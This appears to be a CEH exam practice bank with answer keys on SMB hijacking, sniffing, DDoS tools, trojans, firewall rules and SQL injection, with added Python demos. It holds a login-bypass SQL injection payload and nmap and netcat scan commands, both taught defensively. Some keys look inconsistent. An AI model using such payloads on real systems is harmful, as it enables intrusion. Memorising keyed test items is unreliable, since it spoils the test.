C#CEH Q.1 If your concern is hackers coming across the firewall and using SMB session hijacking, ^  you can block that by not allowing UDP ports __________ as well as TCP ports _________ from coming through the firewall. ^  (Select the Best Answer)^A.	167, 345 and 123 and 137^B.	80, 21 and 23, 110^C.	137, 138 and 139, 445^D.	1277, 1270 and 80, 21
D#CEH Q.2 Microsoft has maintained backward compatibility with its older dialects. This backward compatibility means that when an SMB session is initiated, a more primitive plain text level of authentication can often be negotiated that provides for maximum exposure of the password data. ^  Because SMB was developed to facilitate file and print sharing on local networks, a Windows client will automatically attempt to log onto an SMB server. ^  In the process, the host and client will exchange password hashes. ^  These pairs of password hashes, the challenge from the host plus the response from the client, can be sniffed and saved for later cracking by using which of the following hacking tools? (Select the Best Answer)^A.	SMBRelay^B.	ObiWan^C.	Hunt^D.	L0phtcrack^E.	NBTCracker
C#CEH Q.3 How do you prevent SMB Hijacking in Windows operating systems? (Select the Best Answer)^A.	Install WINS Server and configure secure authentication.^B.	Disable NetBIOS over TCP/IP in Windows NT and 2000.^C.	The only effective way to block SMB hijacking is to use SMB signing.^D.	Configure 128-bit SMB credentials key-pair in TCP/IP properties.
B#CEH Q.4 This tool is a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. ^  You can interactively browse the capture data, viewing summary and detail information for each packet. ^  This tool has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. (Select the Best Answer)^A.	Port Scan plus^B.	Ethereal^C.	Sam Spade^D.	Lp0Crack
D#CEH Q.5 What is a packet sniffer? (Select the Best Answer)^A.	A packet sniffer is a keyboard logger that plugs into computer networks and captures passwords.^B.	A packet sniffer is a packet blocker firewall that plugs into computer networks and generates packets.^C.	A packet sniffer is an Intrusion Detection System that monitors real-time hacking events.^D.	A packet sniffer is a wire-tap device that plugs into computer networks and eavesdrops on the network traffic.
ALL#CEH Q.6 What protocols are vulnerable to sniffing? (Select all that apply)^A.	Telnet and rlogin^B.	HTTP^C.	SNMP^D.	NNTP^E.	POP^F.	FTP^G.	IMAP
A#CEH Q.8 If you want to get a list of all the IP addresses as well as aliases assigned within a domain, you can grab that information if the DNS server allows zone transfers. ^  The zone transfer is the method a secondary DNS server uses to update its information from the primary DNS server. DNS servers within a domain are organized using a master-slave method where the slaves get updated DNS information from the master DNS. ^  Which nslookup command dumps all available records, assuming zone transfers are enabled? (Select the Best Answer)^A.	>set type=any > ls -d eccouncil.org >ns.eccouncil.org >exit^B.	< list=any < lc -x eccouncil.org< dns.eccouncil.org< exit^C.	< set type=any < dir -c eccouncil.org< dns.eccouncil.org< exit^D.	< set type=any < list report eccouncil.org< dns.eccouncil.org< exit^E.	< set type=any < dns -ls eccouncil.org< dns.eccouncil.org< exit
B#CEH Q.9 Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. ^  Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. ^  How do you prevent DNS spoofing? (Select the Best Answer)^A.	Disable DNS Mail Relay.^B.	Disable DNS Zone Transfer.^C.	Install DNS logger and track vulnerable packets.^D.	Install DNS Anti-spoofer
A#CEH Q.10 Douglas Brown discovered a new worm that targets Microsoft SQL Server installations where the SQL Administrator password is blank (note that this is the default configuration for SQL Server 2000 and earlier). ^  The worm logs in using the Administrator account, then calls a command shell to FTP and install a Trojan. The Trojan communicates with the attacker via IRC, where the attacker is able to utilize the infected systems to launch Distributed Denial of Service (DDoS) attacks. ^  You would like to port scan all the SQL Servers that are vulnerable to this attack in your organization. Which port number will you scan for? (Select the Best Answer)^A.	1433^B.	1432^C.	1434^D.	1435
B#CEH Q.11 This hacking tool runs as a Windows OS stack and hides itself from the netstat command. Any directory or file that starts with '_root_' will be hidden. Any process that starts with '_root_' will be hidden. (Select the Best Answer)^A.	WINOS Trojan^B.	NT Rootkit^C.	NubUs^D.	Back Orifice
B#CEH Q.12 This Linux program is a daemon intended to catch someone installing a rootkit or running a packet sniffer. ^  It is designed to run continually with a small footprint under an innocuous name. ^  When triggered, it sends email, appends to a logfile, and disables networking or halts the system. It is designed to install with the minimum of disruption to a normal multiuser system, and should not require rebuilding with each kernel change or system upgrade. (Select the Best Answer)^A.	cheops^B.	chkrootkit^C.	desps^D.	qswatcher
D#CEH Q.13 What does the tool MP3Stego do? (Select the Best Answer)^A.	MP3Stego adds watermark to music data in MP3 files during the compression process.^B.	MP3Stego encrypts music in MP3 files during the compression process.^C.	MP3Stego adds images in MP3 files during the compression process.^D.	MP3Stego hides information in MP3 files during the compression process.
B#CEH Q.14 This hacking tool, when placed over a web page, reveals a password displayed as "*****". (Select the Best Answer)^A.	NAT^B.	SnadBoy^C.	Password Revealer^D.	MugBoy
A#CEH Q.15 How long will it take to crack a password using straight dictionary attack (3 million words) on a single 1.5 GHz Intel Pentium machine? (Select the Best Answer)^A.	2.5 mins^B.	13.6 days^C.	4.2 hours^D.	4.6 days
C#CEH Q.16 This tool is a remote scanner for the most common Distributed Denial of Service programs. These were the programs responsible for the recent rash of attacks on high profile web sites such as Yahoo, Amazon, eBay. ^  This tool will detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings. (Select the Best Answer)^A.	DDoScanner^B.	DoSMinger^C.	DDoSPing^D.	DDoSKiller
B#CEH Q.17 This tool from GFI is a freeware security scanner to audit your network security. It scans entire networks and provides NETBIOS information for each computer such as hostname, shares, logged on user name. ^  It does OS detection, tests password strength, detects registry issues. Reports are output in HTML. ^  This tool checks the network for all potential methods that a hacker might use to attack a network. ^  By analyzing the operating system and the applications running on your network, it identifies possible security holes in the network. In other words, it plays the devil's advocate and alerts weaknesses before a hacker can find them, enabling the administrator to deal with these issues before a hacker can exploit them. (Select the Best Answer)^A.	SAN Secure Scanner^B.	LANGuard Network Scanner^C.	GFI Guard^D.	Sentinel Scanner
B#CEH Q.18 The tool MingSweeper. What is it used for? (Select the Best Answer)^A.	MingSweeper is a session hijacking tool.^B.	MingSweeper is a network reconnaissance tool.^C.	MingSweeper is an ARP poisoning tool.^D.	MingSweeper is a port scanner.
A#CEH Q.19 What does the hacking tool NetCat do? (Select the Best Answer)^A.	NetCat is called the TCP/IP swiss army knife. It is a simple Unix utility which reads and writes data across network connections using the TCP or UDP protocol.^B.	NetCat is a powerful tool for network monitoring and data acquisition. This program allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that match a given expression.^C.	NetCat is a flexible packet sniffer/logger that detects attacks. NetCat is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system.^D.	NetCat is a security assessment tool based on SATAN (Security Administrator's Integrated Network Tool).
C#CEH Q.20 What is Whisker? (Select the Best Answer)^A.	Whisker is a Trojan virus.^B.	Whisker is an application scanner.^C.	Whisker is a CGI vulnerability scanner^D.	Whisker is a SNMP dumping tool.
D#CEH Q.21 This tool is a file and directory integrity checker. It aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, ^  it can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. (Select the Best Answer)^A.	Hping2^B.	DSniff^C.	Cybercop Scanner^D.	Tripwire
C#CEH Q.22 This is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. ^  It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. ^  Using this tool, you can: test firewall rules, perform [spoofed] port scanning, test net performance using different protocols, packet size, TOS (type of service), and fragmentation, do path MTU discovery, transfer files (even between really Fascist firewall rules), perform traceroute-like actions under different protocols, fingerprint remote OSs, audit a TCP/IP stack, etc. (Select the Best Answer)^A.	Nemesis^B.	Lids^C.	Hping2^D.	Cybercop Scanner
B#CEH Q.23 WinTrinoo is an example of: (Select the Best Answer)^A.	Firewall^B.	DDoS Attack tool^C.	Virus Scanner^D.	Trojan Program
B#CEH Q.24 Which of the following Nmap commands launches a stealth SYN scan against each machine that is up out of the 255 machines on the class C where target.example.com resides, and tries to determine what operating system is running on each host that is up and running? (Select the Best Answer)^A.	nmap -v target.example.com^B.	nmap -sS -O target.example.com/24^C.	nmap -sX -p 22,53,110,143,4564 198.116.*.1-127^D.	nmap -XS -O target.example.com
A#CEH Q.26 Snort is a Linux based Intrusion Detection System. Which command enables Snort into network intrusion detection (NIDS) mode assuming snort.conf is the name of your rules file and the IP address is: 192.168.1.0 with Subnet Mask:255.255.255.0? (Select the Best Answer)^A.	./snort -c snort.conf 192.168.1.0/24^B.	./snort 192.168.1.0/24 -x snort.conf^C.	./snort -dev -l ./log -a 192.168.1.0/8 -c snort.conf^D.	./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf
C#CEH Q.27 Many web based authentication models revolve around solely trusting cookies for verification of a user's session. If a malicious person can obtain a user's cookies for a service, then he can use those cookies to access the victim's account. ^  Pages that can use a server's cookies are limited to that particular server, or higher-level domain servers (like hotmail.passport.com for '.passport.com' cookies). ^  In order for a malicious person to obtain a victim's cookies for a site, he must manufacture a fake javascript that must execute within a page from that same domain. ^  This is done by manipulating the error messages that are returned, either from 404 requests or form elements that are echoed back to the screen unescaped. For example, by sending a web-mail user an email with a link to the very same server, the link looks harmless, and it can trick the user into clicking on the link, thus running the embedded javascript and sending his cookies to the malicious person. How do you prevent this type of cookie hijacking? (Select the Best Answer)^A.	Escaping all form data that is echoed to the screen and not echoing 404 file requests eliminates this problem.^B.	Setting up some secondary authentication requirement other than cookie information would at least make this session-stealing problem a lesser threat.^C.	Enabling SSL on all the authentication pages will solve the problem.^D.	Implement 128-bit cookie security on all your sessions with the client browser.
A#CEH Q.28 Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow. A vulnerability in the ASP (Active Server Pages) ISAPI filter, loaded by default on all NT4 and Windows 2000 server systems (running IIS), can be exploited to remotely execute code of an attacker's choice. ^  The fault lies within the decoding and interpretation of form data received from malicious clients. ^  By chunk encoding form data we can force IIS to overwrite 4 bytes of arbitrary memory with data we supply. This is a very serious vulnerability and Microsoft suggests that administrators install the supplied patch as soon as possible. ^  What is the patch number which fixes this bug in IIS? (Select the Best Answer)^A.	Microsoft Security Bulletin MS02-018^B.	Microsoft Security Bulletin MS02-456^C.	Microsoft Security Bulletin MS02-056^D.	Microsoft Security Bulletin MS02-234
E#CEH Q.29 tini is a simple and very small (3kb) trojan backdoor for Windows, coded in assembler. It listens on a TCP port and gives the attacker a remote Command Prompt. What port number does it listen on by default? (Select the Best Answer)^A.	3333^B.	4444^C.	5555^D.	6666^E.	7777
C#CEH Q.30 Which of the following program is capable of detecting and removing more than 1000 Trojan Horses from your system? (Select the Best Answer)^A.	NuBuS^B.	SubSeven^C.	Tauscan^D.	BO^E.	Tini^F.	TrojanKiller
D#CEH Q.31 What is Zombie Zapper? (Select the Best Answer)^A.	Zombie Zapper is a DDoS tool that installs on a victim's machine as "zombie".^B.	Zombie Zapper is a firewall, which works on Linux and Solaris OS.^C.	Zombie Zapper is a trojan that listens on port 2345.^D.	Zombie Zapper is a free, open source tool that can tell a zombie system flooding packets to stop flooding.
B,C#CEH Q.32 Which of the following are examples of Distributed Denial of Service (DDoS) attack tools? (Select all that apply)^A.	WinTrinoo^B.	TFN2K^C.	Stacheldraht^D.	Knight^E.	Kayton^F.	GTBot
B#CEH Q.33 Netcat is a simple network utility which reads and writes data across network connections, using the TCP or UDP protocol. Which of the following commands scans for open ports between [1 - 140]? (Select the Best Answer)^A.	nc -xx -q -w2 my-attacker-IP-address [1-140]^B.	nc -vv -z -w2 my-attacker-IP-address 1-140^C.	nc my-attacker-IP-address (1,140)^D.	nc 140 my-attacker-IP-address -vv
B#CEH Q.34 This network tool is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. ^  This tool isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates. (Select the Best Answer)^A.	AeroSeek^B.	AiroPeek^C.	AirMan^D.	AirCell^E.	AirWire
D#CEH Q.35 Which of the following is a wireless LAN (WLAN) tool which recovers encryption keys? (Select the Best Answer)^A.	AirPeek^B.	AirMan^C.	Airport^D.	AirSnort
D#CEH Q.36 "Anonymous web surfing" is a proxy server, which downloads the webpage you requested and then displays the web page to you through an encrypted URL. ^  Since your computer doesn't make a connection to the server, the page is brought to you totally anonymously; the site has no idea you were there, and information about you and your computer isn't gathered by that website. ^  All you do is type in the web site you want to visit and you will be taken there promptly and securely. Which of the following web sites provides free anonymous web surfing services? (Select the Best Answer)^A.	http://www.anoyume.com^B.	http://www.privacybusters.com^C.	http://www.badboys.com^D.	http://www.silenter.com
B#CEH Q.37 Which hacking tool exploits Microsoft Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability?(Select the Best Answer)^A.	IIS Lockdown^B.	Jill-32^C.	IPP Scanner^D.	IPP Exploit^E.	URLScan
C#CEH Q.38 Which of the following is a ramdisk-based Linux distribution that boots from a single floppy and loads its packages from an HTTP/FTP server? (Select the Best Answer)^A.	Red Hat Linux^B.	Turbo Linux^C.	Trinux^D.	Flopix^E.	Raminux
A#CEH Q.39 SQL injection is usually caused by developers who use "string-building" techniques in order to execute SQL code. For example, in a search page, the developer may use the following code to execute a query:	^  Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'") ^  Which of the following prevents SQL injection on a web page? (Select the Best Answer)^A.	For string data, replace single quotes with two single quotes using the replace function or equivalent: goodString = replace(inputString, "'", "''")^B.	For string data, replace double quotes with two single quotes using the replace function or equivalent: goodString = replace(inputString, """", "''")^C.	For string data, replace single quotes with an asterisk using the replace function or equivalent: goodString = replace(inputString, "'", "*")^D.	For string data, replace single quotes with two underscore characters using the replace function or equivalent: goodString = replace(inputString, "'", "__")
D#CEH Q.40 How do you test for SQL injection vulnerability on a Web page? (Select the Best Answer)^A.	Input an "asterisk character", something like:^  hi* or 1=1-- ^  into the login, or password, or in the URL. Example:^  Login: hi* or 1=1--^  Pass: hi* or 1=1--^  http://duck/index.asp?id=hi* or 1=1--^B.	Input an "underscore character", something like:^  hi__ or 1=1--^  into the login, or password, or in the URL. Example:^  Login: hi__ or 1=1--^  Pass: hi__ or 1=1--^  http://duck/index.asp?id=hi__ or 1=1--^C.	Input a "double quote", something like:^  hi'' or 1=1--^  into the login, or password, or in the URL. Example:^  Login: hi'' or 1=1--^  Pass: hi'' or 1=1--^  http://duck/index.asp?id=hi'' or 1=1--^D.	Input a "single quote", something like:^  hi' or 1=1--^  into the login, or password, or in the URL. Example:^  Login: hi' or 1=1--^  Pass: hi' or 1=1--^  http://duck/index.asp?id=hi' or 1=1--
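An added example, not part of the original question bank, that runs the two questions above against a real database engine: the vulnerable string-built query from Q.39, the quote-doubling fix its answer describes, and the bound-parameter form a practitioner would use instead. It uses Python's sqlite3 module with a constructed two-row users table; the table, user names and passwords are assumptions of the example, and the test string is the Q.40 single-quote payload.

```python
import sqlite3

# Constructed sample data, not from the original page.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """In-memory SQLite database with a tiny users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_string_built(conn, user, pw):
    """Vulnerable: the same string-building pattern as the ASP code in Q.39.
    User input becomes part of the SQL text, so a quote ends the literal
    and '--' comments out the password check."""
    sql = ("SELECT name FROM users WHERE name = '" + user
           + "' AND pw = '" + pw + "'")
    return sorted(row[0] for row in conn.execute(sql))


def escape_quotes(s):
    """Q.39 answer A: double every single quote so it stays inside the literal."""
    return s.replace("'", "''")


def login_escaped(conn, user, pw):
    """Still string-built, but with the quote-doubling mitigation applied."""
    sql = ("SELECT name FROM users WHERE name = '" + escape_quotes(user)
           + "' AND pw = '" + escape_quotes(pw) + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_parameterized(conn, user, pw):
    """Bound parameters: the driver sends input as data, never as SQL text.
    This also covers numeric columns, where quote-doubling does nothing."""
    rows = conn.execute(
        "SELECT name FROM users WHERE name = ? AND pw = ?", (user, pw))
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    payload = "hi' or 1=1--"            # the Q.40 test string
    db = make_db()
    print("string-built :", login_string_built(db, payload, "x"))   # every user
    print("quote-doubled:", login_escaped(db, payload, "x"))        # []
    print("parameterized:", login_parameterized(db, payload, "x"))  # []
```

With the string-built query the payload turns the statement into `... WHERE name = 'hi' or 1=1--' AND pw = 'x'` and every row comes back; with the doubled quote the whole payload stays inside the string literal and nothing matches. Note that answer A only protects string contexts: an unquoted numeric field (`WHERE id = ` & input) has no quote to double, which is why bound parameters are the safer general fix.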
A#CEH Q.41 Which of the following is a dictionary attack tool for Microsoft SQL Server, which lets you test if the login accounts are strong enough to resist an attack? (Select the Best Answer)^A.	SQLdict^B.	SQLAttack^C.	SQLWalker^D.	C-Q-L-HACK
B#CEH Q.42 Which of the following is a hacking tool that has the ability to hijack TCP sessions? For example, you can capture the contents of a Telnet session and spy on what a person is doing, or hijack the session and start typing in your own commands. (Select the Best Answer)^A.	JungleBungle^B.	Juggernaut^C.	SesHijack^D.	TCP Kidnapper
A#CEH Q.43 Smurf attacks are the easiest distributed DoS attack to commit. ^  In its simplest form, the attacker begins by using a commonly available program to scan the Internet to locate routers that allow entry to broadcast pings. ^  When he or she locates this kind of router, the next step is to forge ping packets with the origination address of the intended victim. This is done using packet manipulation tools. ^  This type of attack can also use other Internet Control Message Protocol (ICMP) techniques. ^  To avoid arrest, the attacker will typically use a hacked computer to send out these forged ping packets. ^  These packets are then sent to the network behind the vulnerable router. ^  Each computer on this network echoes each attacking ping out to the victim designated in the ping's forged header. ^  So if there are two hundred computers on this intermediary network, for every single ping of the attacking computer, they will send 200 pings out to the victim. ^ How do you defend against this type of Smurf attack? (Select the Best Answer)^A.	deny broadcast pings at the intermediary network's border router.^B.	deny ICMP at the intermediary network's border router.^C.	deny smurf 34.6 type frames at the firewall.^D.	enable broadcast pings at the intermediary network's border router.
D#CEH Q.44 Which tool detects the presence of Trinoo, TFN, or Stacheldraht clients on your machine? (Select the Best Answer)^A.	DDoS Detector^B.	TrinooBuster^C.	TFNKiller^D.	RID
C#CEH Q.45 Trinoo is a dangerous distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. A trin00 network consists of a small number of servers, or masters, and a large number of clients, or daemons. ^  The denial of service attack utilizing a trin00 network is carried out by an intruder connecting to a trin00 master and instructing that master to launch a denial of service attack against one or more IP addresses. The trin00 master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time. On which default UDP port does the master send its command packets to the daemons? (Select the Best Answer)^A.	27445^B.	27447^C.	27444^D.	27449
C#CEH Q.46 Buffer overflow attacks exploit a lack of bounds checking on the size of input being stored in a buffer array. ^  By writing data past the end of an allocated array, the attacker can make arbitrary changes to program state stored adjacent to the array. How do you protect your system from buffer overflow exploits? (Select the Best Answer)^A.	Install a firewall system which protects from buffer overflow exploits.^B.	Install an IDS system which protects from buffer overflow exploits.^C.	Proper OS Patch maintenance is the best way to protect your systems from the buffer overflow attack.^D.	Proper virus pattern maintenance is the best way to protect your systems from the buffer overflow attack.
D#CEH Q.47 First appearing on September 18, 2001, Nimda is a computer virus that caused traffic slowdowns as it rippled across the Internet, spreading through four different methods, infecting computers running Microsoft's Web server, Internet Information Server (IIS), and computer users who opened an e-mail attachment. ^  Like a number of predecessor viruses, Nimda's payload appears to be the traffic slowdown itself - that is, it does not appear to destroy files or cause harm other than the considerable time that may be lost to the slowing or loss of traffic known as denial-of-service and the restoring of infected systems. With its multi-pronged attack, Nimda appears to be the most troublesome virus of its type that has yet appeared. Nimda drops a file which, when run, continues to propagate the virus. What is the name of this file? (Select the Best Answer)^A.	cmd.exe^B.	patch.exe^C.	explorer.dll^D.	admin.dll
B#CEH Q.48 What buffer overflow vulnerability does the Nimda virus exploit to gain access to IIS servers? (Select the Best Answer)^A.	Internet Printing Protocol (IPP)^B.	ISAPI DLL^C.	Windows 2000 KRNLOS.EXE^D.	IIS SMTP Services
A#CEH Q.50 This is a Novell Netware hacking tool which simulates a Novell file server. The server will be visible for about 1 to 2 minutes. ^  On some systems the server will be visible for as long as the program is running. (Select the Best Answer)^A.	Novelffs^B.	Novell Faker^C.	Noveknell^D.	Novell Detector
C#CEH Q.51 Digging into the rubbish bin to find pieces of information is an example of what attack? (Select the Best Answer)^A.	Spoofing^B.	Social Engineering^C.	Dumpster Diving^D.	Information gathering
B,C#CEH Q.52 In a man-in-the-middle (MiTM)attack of a SSL connection sniffing, which of the following are true?^          Session Key A                     Session Key B^  Server -------------- middle man --------------- Client^  (Select all that apply)^A.	Session Key A is sent by middle man and encrypted by client public key^B.	Session Key B is sent by client and encrypted by middle man public key^C.	Session Key A is sent by middle man and encrypted by server public key^D.	Session Key B is sent by client and encrypted by client public key^E.	Session Key A is sent by middle man and encrypted by client private key^F.	Session Key B is sent by client and encrypted by server private key
D#CEH Q.53 Which of the following network connections is encrypted and cannot be sniffed by an attacker on the network? (Select the Best Answer)^A.	Telnet^B.	POP3^C.	NFS^D.	SSH^E.	SMTP
B#CEH Q.54 In the Linux BIND NXT bug remote root exploit attack, the hacker inserts the shell code into which of the following connections? (Select the Best Answer)^A.	UDP on victim port 53^B.	TCP on victim port 53^C.	UDP on victim port above 1024^D.	TCP on victim port above 1024
D#CEH Q.55 An attacker on a Linux system may be able to recover a removed file from a disk under which of the following conditions? (Select the Best Answer)^A.	if he knows the name of the removed file^B.	if he knows the date the file was removed^C.	if he knows the size of the file that was removed^D.	if he knows the inode value of the removed file
C,D,E#CEH Q.56 These are the firewall filter rules configured on a Linux system:^  # set the default to deny all incoming network traffic^  /sbin/ipchains -P input DENY^  # Allow incoming TCP traffic^  /sbin/ipchains -A input -i eth0 -p tcp ! -y -s any/0 -j ACCEPT^  An attacker scans the Linux system. The -y flag matches only segments with SYN set and ACK and FIN clear, so "! -y" accepts every TCP segment that is not a bare SYN. Which of the following scans will the firewall not block? (Select all that apply)^A.	TCP connection scan^B.	Half connect()^C.	FIN scan^D.	Xmas scan^E.	Null scan
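An added example (not from the original page) that evaluates the two-line ipchains ruleset above against the first probe packet of each scan type named in the question. The flag letters and the probe table are constructed assumptions of the example; the semantics of -y (SYN set, ACK and FIN clear) are those of ipchains itself. Because the rule is stateless, anything that is not a bare SYN passes, including ACK-only probes and the FIN, Xmas and Null scans.

```python
# ipchains "-y" matches a TCP segment with SYN set and ACK and FIN clear,
# i.e. the first packet of a new connection. "! -y" matches everything else.
# Flag strings use tcpdump-style letters: S=SYN A=ACK F=FIN P=PSH U=URG R=RST.

# Constructed probe set (an assumption of this example) for the five scan
# types named in the question: the flags on the first packet each one sends.
SCAN_FIRST_PACKET = {
    "TCP connect() scan": "S",    # full handshake, starts with a bare SYN
    "Half-open SYN scan": "S",    # also a bare SYN, never completes
    "FIN scan": "F",
    "Xmas scan": "FPU",
    "Null scan": "",
}


def is_syn_only(flags):
    """Equivalent of the ipchains -y test."""
    return "S" in flags and "A" not in flags and "F" not in flags


def input_chain_verdict(proto, flags, in_iface="eth0"):
    """Apply the ruleset from the question:
    -P input DENY, then -A input -i eth0 -p tcp ! -y -s any/0 -j ACCEPT."""
    if in_iface == "eth0" and proto == "tcp" and not is_syn_only(flags):
        return "ACCEPT"
    return "DENY"  # chain policy for everything the one rule does not match


def scans_not_blocked():
    """Scan types whose probes pass the filter unchanged."""
    return [name for name, flags in SCAN_FIRST_PACKET.items()
            if input_chain_verdict("tcp", flags) == "ACCEPT"]


if __name__ == "__main__":
    for name, flags in SCAN_FIRST_PACKET.items():
        verdict = input_chain_verdict("tcp", flags)
        print(f"{name:20s} flags={flags or '-':4s} -> {verdict}")
    print("Not blocked:", scans_not_blocked())
```

The same check shows why this style of rule is weak: an ACK-only probe (nmap -sA) is also accepted, which is the reason stateful connection tracking replaced the -y trick in iptables.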
A#CEH Q.57 Which of the following filter rules configured on a Linux system will block all outgoing ssh and telnet traffic to the hosts of the IP range 192.168.0.0 to 192.168.39.255? (Select the Best Answer)^A.	ipchains -A output -p tcp -s any/0 -d 192.168.0.0/19 22:23 -j DENY -l^  ipchains -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l^B.	iptables -A input -r ICMP -s any/0 -d 192.168.0.0/19 23:22 -j DENY -l^  iptables -A output -p tcp -s any/0 -d 192.168.32.0/21 23:22 -j DENY -l^C.	ipcommand -A output -p tcp -s permit/1 -d 192.168.0.0/19 22:23 -j ALLOW -l^  ipcommand -A output -p tcp -s permit/1 -d 192.168.32.0/21 22:23 -j ALLOW -l^D.	ipfilter -A output -p tcp -s any/0 -d 192.168.0.0/19 22:23 -j DENY -l^  ipfilter -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l
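An added example (not from the original page) showing the check a practitioner would run before trusting the CIDR blocks in the answer: 192.168.0.0–192.168.39.255 is not a single power-of-two block, so Python's ipaddress module is used to split it into the minimal covering prefixes and to emit one rule per prefix in the ipchains syntax of the question. The rule template and the probe addresses are assumptions of the example.

```python
import ipaddress


def cover_range(first, last):
    """Smallest set of CIDR blocks that exactly covers first..last inclusive."""
    nets = ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last))
    return [str(n) for n in nets]


def ipchains_deny_rules(first, last, ports="22:23"):
    """One ipchains output rule per block, in the syntax used by the question
    (ports 22:23 = ssh and telnet, -l logs the match)."""
    return [f"ipchains -A output -p tcp -s any/0 -d {net} {ports} -j DENY -l"
            for net in cover_range(first, last)]


def is_covered(ip, first, last):
    """Would a destination be caught by the generated blocks?"""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(n) for n in cover_range(first, last))


if __name__ == "__main__":
    lo, hi = "192.168.0.0", "192.168.39.255"
    for rule in ipchains_deny_rules(lo, hi):
        print(rule)
    # Constructed probes: first address, last address, and one just past the end.
    for probe in ("192.168.0.1", "192.168.39.255", "192.168.40.0"):
        print(probe, "blocked" if is_covered(probe, lo, hi) else "allowed")
```

The range summarizes to 192.168.0.0/19 (0.0 through 31.255) plus 192.168.32.0/21 (32.0 through 39.255), which is exactly the pair of destinations in answer A; 192.168.40.0 falls outside both and is still allowed.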
C#CEH Q.58 From the following spam mail header, identify the host IP that sent this spam.^  Note: This question includes an HTML table which may not be accurately rendered^  From jie02@netvigator.com Tue Nov 27 17:27:11 2001^  Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)^  Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)^  Message-Id: <200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk>^  From: "china hotel web"^  To: "Shlam"^  Subject: SHANGHAI (HILTON HOTEL) PACKAGE^  Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0^  X-Priority: 3 X-MSMail-^  Priority: Normal^  Reply-To: "china hotel web"^	(Select the Best Answer)^A.	137.189.96.52^B.	203.218.39.50^C.	203.218.39.20^D.	8.12.1.0
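An added example (not from the original page) that automates the reasoning behind this question: Received: headers are prepended by each relay, so the bottom-most line written by a relay you trust records the IP that actually connected. The header text below is a constructed copy of the two Received: lines from the question joined onto single lines with the stripped recipient addresses omitted; the trusted-domain suffix and the HELO-versus-reverse-DNS heuristic are assumptions of the example.

```python
import re

# Constructed copy of the relevant headers from the question (single-line
# Received: fields, stripped recipients left out).
SPAM_HEADERS = """\
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: <200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk>
From: "china hotel web"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE
"""

# Received: from <HELO name> (<reverse DNS> [<IP>]) by <receiving host>
RECEIVED_RE = re.compile(
    r"^Received: from (\S+) \((?:(\S+) )?\[(\d{1,3}(?:\.\d{1,3}){3})\]\) by (\S+)",
    re.MULTILINE)


def received_hops(headers):
    """(helo, rdns, ip, by_host) tuples in header order: the top line is the
    last relay, the bottom line is the first server the sender connected to."""
    return [m.groups() for m in RECEIVED_RE.finditer(headers)]


def origin_ip(headers, trusted_suffix=".cuhk.edu.hk"):
    """Walk down the chain while the 'by' host is one of our own relays; the
    bracketed IP recorded by the last trusted relay is the true source.
    Any Received: line below that could have been forged by the sender."""
    source = None
    for _helo, _rdns, ip, by_host in received_hops(headers):
        if not by_host.endswith(trusted_suffix):
            break
        source = ip
    return source


def helo_mismatches(headers):
    """Heuristic spam signal (an assumption of this example): a HELO name whose
    first label differs from the reverse DNS name the relay resolved."""
    return [(helo, rdns, ip) for helo, rdns, ip, _by in received_hops(headers)
            if rdns and helo.split(".")[0] != rdns.split(".")[0]]


if __name__ == "__main__":
    print("origin:", origin_ip(SPAM_HEADERS))
    print("suspicious HELO:", helo_mismatches(SPAM_HEADERS))
```

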